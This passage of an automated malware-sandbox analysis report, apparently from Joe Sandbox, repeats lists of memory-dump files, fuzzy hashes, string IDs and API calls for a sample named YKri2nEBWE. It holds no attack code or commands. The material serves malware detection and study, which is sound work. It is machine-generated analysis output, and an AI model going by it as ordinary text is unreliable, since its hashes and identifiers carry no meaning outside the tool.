                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: @Ukx$
                                                                                                                                                                                                                                    • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                    • Opcode ID: daf8fb2c78a2f59409cc4f611ea6b3e22b7cc17834d04c10ffd59a0892e29a6e
                                                                                                                                                                                                                                    • Instruction ID: 5e1418a4d048e45a5cc227cd6a1389b20e218a92c948eb3459548a0f7bbea243
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daf8fb2c78a2f59409cc4f611ea6b3e22b7cc17834d04c10ffd59a0892e29a6e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71B16532B087104BD3289E28DCD12AFB7E6EBC5318F2DC53CE99657385DA359D068781
                                                                                                                                                                                                                                    Function 00C4E687 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: CBDD7B477E2DD198BEBA0C6A975F1733
                                                                                                                                                                                                                                    • API String ID: 0-1004846748
                                                                                                                                                                                                                                    • Opcode ID: 54bc3c0262c4e58f90ad4bf63cee3df60fb803b43cf29b4b0b78751b92c3760c
                                                                                                                                                                                                                                    • Instruction ID: 4fcd8a305540578db647ca5c767e5cbea99ad7dcbe5fd08fc4e79c366fbe679c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54bc3c0262c4e58f90ad4bf63cee3df60fb803b43cf29b4b0b78751b92c3760c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53815D75640B418BD724CB38CC927A7B7E2FF9A315F0DCA6CD4968B743E639A8428750
                                                                                                                                                                                                                                    Function 00C67440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: _^]\
                                                                                                                                                                                                                                    • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                    • Opcode ID: 55ebc10f66db3e39f6cdd2d2d1f93165eaaf36df984803b9003fa8651e40b019
                                                                                                                                                                                                                                    • Instruction ID: c981809414619843eca81a3ebe9653923392cfd4751edf5739829ff944aedb09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55ebc10f66db3e39f6cdd2d2d1f93165eaaf36df984803b9003fa8651e40b019
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C27136B1A083005BE7249F69DCD2B3B77E1EF8131CF188A2CE49687282E634DD059756
                                                                                                                                                                                                                                    Function 00C7E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LdrInitializeThunk.NTDLL(00C8148A,?,00000018,?,?,00000018,?,?,?), ref: 00C7E13E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                    Function 00C81720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: =<32
                                                                                                                                                                                                                                    • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                    • Opcode ID: e63452465079af40646166f7308bf9124f549d55d68840bcf2d97bad42907eee
                                                                                                                                                                                                                                    • Instruction ID: 86e00cc1eb8f9c499f0bf43171c65396e391c726427ce8d4d5871ac6827a453d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63452465079af40646166f7308bf9124f549d55d68840bcf2d97bad42907eee
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A63168346043049BE714AE149C92B3FB3D9EB85758F1C852CFA94572D0E730DD42978A
                                                                                                                                                                                                                                    Function 00C61A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
